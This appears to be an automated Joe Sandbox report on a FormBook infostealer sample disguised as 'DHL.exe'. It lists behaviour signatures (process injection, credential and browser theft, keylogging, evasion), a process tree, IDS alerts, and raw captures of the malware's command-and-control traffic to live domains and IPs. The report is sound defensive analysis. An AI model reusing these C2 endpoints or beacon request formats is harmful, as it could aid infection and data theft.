Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL.exe

Overview

General Information

Sample name:DHL.exe
Analysis ID:1576518
MD5:12e3c1457416b5622f040f8e0edc0298
SHA1:74a88947c14538bf6ba2dccdeed472820159dc2c
SHA256:1a2f0649b6a928da703f8ab11ace25807dff07e0e5310f995b9acb378cd1c6a5
Tags:DHLexeFormbookuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • DHL.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\DHL.exe" MD5: 12E3C1457416B5622F040F8E0EDC0298)
    • svchost.exe (PID: 7580 cmdline: "C:\Users\user\Desktop\DHL.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • eYHtcsfFquWF.exe (PID: 5260 cmdline: "C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wiaacmgr.exe (PID: 7784 cmdline: "C:\Windows\SysWOW64\wiaacmgr.exe" MD5: 2F1D379CE47E920BDDD2C50214457E0F)
          • eYHtcsfFquWF.exe (PID: 5164 cmdline: "C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.2710446513.00000000045C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.2712813686.0000000005030000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2710629488.0000000004610000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.2700411137.0000000002850000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.1707823352.0000000003300000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL.exe", CommandLine: "C:\Users\user\Desktop\DHL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL.exe", ParentImage: C:\Users\user\Desktop\DHL.exe, ParentProcessId: 7488, ParentProcessName: DHL.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL.exe", ProcessId: 7580, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\DHL.exe", CommandLine: "C:\Users\user\Desktop\DHL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL.exe", ParentImage: C:\Users\user\Desktop\DHL.exe, ParentProcessId: 7488, ParentProcessName: DHL.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL.exe", ProcessId: 7580, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:24:13.599131+010028554641A Network Trojan was detected192.168.2.849709185.199.110.15380TCP
                2024-12-17T08:24:16.358783+010028554641A Network Trojan was detected192.168.2.849710185.199.110.15380TCP
                2024-12-17T08:24:19.108224+010028554641A Network Trojan was detected192.168.2.849711185.199.110.15380TCP
                2024-12-17T08:24:28.902939+010028554641A Network Trojan was detected192.168.2.849713104.21.48.23380TCP
                2024-12-17T08:24:31.494241+010028554641A Network Trojan was detected192.168.2.849714104.21.48.23380TCP
                2024-12-17T08:24:34.406390+010028554641A Network Trojan was detected192.168.2.849715104.21.48.23380TCP
                2024-12-17T08:24:44.111502+010028554641A Network Trojan was detected192.168.2.849719199.59.243.22780TCP
                2024-12-17T08:24:46.802876+010028554641A Network Trojan was detected192.168.2.849720199.59.243.22780TCP
                2024-12-17T08:24:49.495303+010028554641A Network Trojan was detected192.168.2.849721199.59.243.22780TCP
                2024-12-17T08:24:59.858741+010028554641A Network Trojan was detected192.168.2.8497238.136.96.10680TCP
                2024-12-17T08:25:02.518436+010028554641A Network Trojan was detected192.168.2.8497248.136.96.10680TCP
                2024-12-17T08:25:05.230535+010028554641A Network Trojan was detected192.168.2.8497258.136.96.10680TCP
                2024-12-17T08:25:14.760146+010028554641A Network Trojan was detected192.168.2.84972769.57.163.6480TCP
                2024-12-17T08:25:17.424909+010028554641A Network Trojan was detected192.168.2.84972869.57.163.6480TCP
                2024-12-17T08:25:20.112516+010028554641A Network Trojan was detected192.168.2.84972969.57.163.6480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T08:24:31.494241+010028563181A Network Trojan was detected192.168.2.849714104.21.48.23380TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: DHL.exeAvira: detected
                Source: DHL.exeVirustotal: Detection: 29%Perma Link
                Source: DHL.exeReversingLabs: Detection: 42%
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2710446513.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2712813686.0000000005030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2710629488.0000000004610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2700411137.0000000002850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1707823352.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1707521744.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1708319650.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2709918624.0000000003CB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: DHL.exeJoe Sandbox ML: detected
                Source: DHL.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eYHtcsfFquWF.exe, 00000004.00000002.2700431435.000000000012E000.00000002.00000001.01000000.00000005.sdmp, eYHtcsfFquWF.exe, 00000006.00000002.2700413450.000000000012E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: DHL.exe, 00000000.00000003.1463417563.0000000003690000.00000004.00001000.00020000.00000000.sdmp, DHL.exe, 00000000.00000003.1462103943.0000000003170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1707862463.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609031075.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1707862463.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1611529786.0000000003200000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1707826366.00000000044CC000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2711323024.0000000004850000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2711323024.00000000049EE000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1710157325.000000000469F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: DHL.exe, 00000000.00000003.1463417563.0000000003690000.00000004.00001000.00020000.00000000.sdmp, DHL.exe, 00000000.00000003.1462103943.0000000003170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1707862463.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609031075.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1707862463.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1611529786.0000000003200000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, wiaacmgr.exe, 00000005.00000003.1707826366.00000000044CC000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2711323024.0000000004850000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2711323024.00000000049EE000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1710157325.000000000469F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wiaacmgr.pdbGCTL source: svchost.exe, 00000002.00000003.1674473037.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1674557677.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, eYHtcsfFquWF.exe, 00000004.00000002.2708173284.0000000000B78000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wiaacmgr.pdb source: svchost.exe, 00000002.00000003.1674473037.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1674557677.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, eYHtcsfFquWF.exe, 00000004.00000002.2708173284.0000000000B78000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: wiaacmgr.exe, 00000005.00000002.2701656661.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2712106181.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000000.1781779621.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2008088065.0000000038AAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: wiaacmgr.exe, 00000005.00000002.2701656661.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2712106181.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000000.1781779621.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2008088065.0000000038AAC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00A0DBBE
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009DC2A2 FindFirstFileExW,0_2_009DC2A2
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A168EE FindFirstFileW,FindClose,0_2_00A168EE
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00A1698F
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A0D076
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A0D3A9
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A19642
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A1979D
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00A19B2B
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A15C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00A15C97
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0286C9D0 FindFirstFileW,FindNextFileW,FindClose,5_2_0286C9D0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 4x nop then xor eax, eax5_2_02859E50
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 4x nop then pop edi5_2_0285E59E
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 4x nop then mov ebx, 00000004h5_2_047404E8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.8:49714 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49709 -> 185.199.110.153:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49710 -> 185.199.110.153:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49725 -> 8.136.96.106:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49728 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49711 -> 185.199.110.153:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49721 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49729 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49720 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49724 -> 8.136.96.106:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49713 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 8.136.96.106:80
                Source: DNS query: www.juewucangku.xyz
                Source: DNS query: www.juewucangku.xyz
                Source: DNS query: www.startsomething.xyz
                Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
                Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
                Source: Joe Sandbox ViewASN Name: FORTRESSITXUS FORTRESSITXUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A1CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00A1CE44
                Source: global trafficHTTP traffic detected: GET /3e00/?rPh=vcWi2Nuzfs8bFUYEQnXoBGbuOVlE2i7vXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCKhlhB0ucBfa9KdBCtjbE5oHHxOp6OdcL90Ef3I2JAzosFGA==&kVvpD=Bx4T HTTP/1.1Host: www.goldbracelet.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficHTTP traffic detected: GET /k3hn/?rPh=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs81mcvpy2JTiV0mNzD6MbLs+vdIgTAzo2XEDLCKFuL/iGeag==&kVvpD=Bx4T HTTP/1.1Host: www.pku-cs-cjw.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficHTTP traffic detected: GET /al74/?rPh=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/SUiQI/oGzb8PpnvlDT2bJ+R5Sn1ObiYbGTGLsy9HRXwDQ==&kVvpD=Bx4T HTTP/1.1Host: www.ausyva4.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficHTTP traffic detected: GET /cfcv/?rPh=yFDcd28s49uqEHKp5gxZDHehDMkbx8O5HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/RFpqWmAJN7Naqf7NuMxlktjiSvXKA5GjZW5lR8Lr/Dnajw==&kVvpD=Bx4T HTTP/1.1Host: www.969-usedcar02.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficHTTP traffic detected: GET /b6bc/?rPh=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0uykY2c1YtOuNjF0odUunu7vTTMkkGOdpFXJ3f6l6FBu5A==&kVvpD=Bx4T HTTP/1.1Host: www.juewucangku.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficHTTP traffic detected: GET /9er8/?rPh=y0ZQaQGYytoPYKDdgLZSit2uqdIxJa9e7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaaX16+D89AnEZm+xwCYUrhMUvMxACYJDUe5GKortKSbmbEQ==&kVvpD=Bx4T HTTP/1.1Host: www.startsomething.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficDNS traffic detected: DNS query: www.goldbracelet.top
                Source: global trafficDNS traffic detected: DNS query: www.pku-cs-cjw.top
                Source: global trafficDNS traffic detected: DNS query: www.ausyva4.top
                Source: global trafficDNS traffic detected: DNS query: www.969-usedcar02.shop
                Source: global trafficDNS traffic detected: DNS query: www.juewucangku.xyz
                Source: global trafficDNS traffic detected: DNS query: www.startsomething.xyz
                Source: global trafficDNS traffic detected: DNS query: www.opro.vip
                Source: unknownHTTP traffic detected: POST /k3hn/ HTTP/1.1Host: www.pku-cs-cjw.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 204Connection: closeOrigin: http://www.pku-cs-cjw.topReferer: http://www.pku-cs-cjw.top/k3hn/User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)Data Raw: 72 50 68 3d 51 62 31 39 6b 42 55 6f 6c 5a 5a 78 59 59 74 4a 4e 31 74 49 6c 58 39 39 6a 70 6f 64 70 32 42 55 7a 2b 6e 58 30 4d 79 4c 6e 62 33 33 4e 62 57 4a 42 4d 75 61 4b 64 73 4b 34 65 5a 79 2f 6a 47 49 54 6f 53 4b 78 67 55 64 55 52 56 48 7a 6b 6a 43 37 49 35 4f 72 47 45 6e 76 77 69 4e 4b 54 35 79 6f 37 6d 36 7a 74 6e 4b 7a 4a 47 49 46 51 32 55 72 34 69 42 4d 47 69 6c 61 77 43 42 78 31 33 74 4d 79 6e 59 72 6f 30 47 41 79 79 2f 54 56 39 59 62 61 42 50 49 42 74 49 76 35 4d 56 56 4d 63 35 51 6b 4a 5a 44 54 70 46 5a 72 35 72 30 39 42 78 37 30 66 2f 4c 48 4f 42 4e 69 46 36 45 79 6b 76 78 65 4e 4e 76 78 49 3d Data Ascii: rPh=Qb19kBUolZZxYYtJN1tIlX99jpodp2BUz+nX0MyLnb33NbWJBMuaKdsK4eZy/jGIToSKxgUdURVHzkjC7I5OrGEnvwiNKT5yo7m6ztnKzJGIFQ2Ur4iBMGilawCBx13tMynYro0GAyy/TV9YbaBPIBtIv5MVVMc5QkJZDTpFZr5r09Bx70f/LHOBNiF6EykvxeNNvxI=
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 17 Dec 2024 07:23:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6mWxFc3jlOg%2BYNF2eQSghdWdxAub%2BaemXWN69jXUCSYStI9a1MqFS0TCDLnIlE6vjkPrsB3zfff2TiTr8v6nXrtTfbHta%2FkIoGNTjOTGuDAY8kbcu1Mv0VyLy9N4d77mnqEJlvBMWQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f352ba9cd0d8c0f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1795&rtt_var=897&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=469&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 07:24:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XfFICCTSncZLZLW87I8JYFeIuAut1Tjetz4C%2B38Vn8MFMDLRDerJdvMxPS2QA8cXee3Mymx5wdTbpnBP3hm%2FwCSfDfDht4NMSeVyvpH3GxRb7VzfyJeUllqVUEcX3OiStYo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f352c768bf4f78d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1467&rtt_var=733&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=724&delivery_rate=0&cwnd=73&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b dd 65 45 29 21 07 6d 45 a1 6a d1 15 f4 98 36 d3 26 98 66 4a 76 b6 cb fe 7b e9 da 95 22 78 c9 cb 64 e6 7b 4c 78 ea 62 f6 72 57 7e 2e e7 f0 50 3e 2d 60 f9 7e bb 78 bc 83 cb 11 e2 e3 bc bc 47 9c 95 b3 9f 4e 3e 9e 20 ce 9f 2f f5 70 a0 9c ec 42 a7 64 ac 56 e2 25 90 2e 26 05 3c b3 c0 3d d7 d1 2a fc 79 54 d8 8d 0c 07 6a c5 b6 3d ea 9a a2 50 d2 ca 65 7f 09 97 69 85 a7 f6 70 00 6f 9c 52 0b 1b 4e 20 8e c0 c7 35 c7 03 45 4f 71 4d 63 b5 4a a8 87 83 65 20 53 11 24 da 73 12 10 e7 2b d8 51 55 99 2d 81 89 f6 c8 84 da 52 c7 6f 38 04 6e 7c dc 82 8f 1b 4e 3b 23 9e 23 08 43 5d f5 6e a5 33 f1 0b 5a ae e1 40 a9 85 5d bd 76 17 0a f7 c7 a5 c5 ac 02 75 97 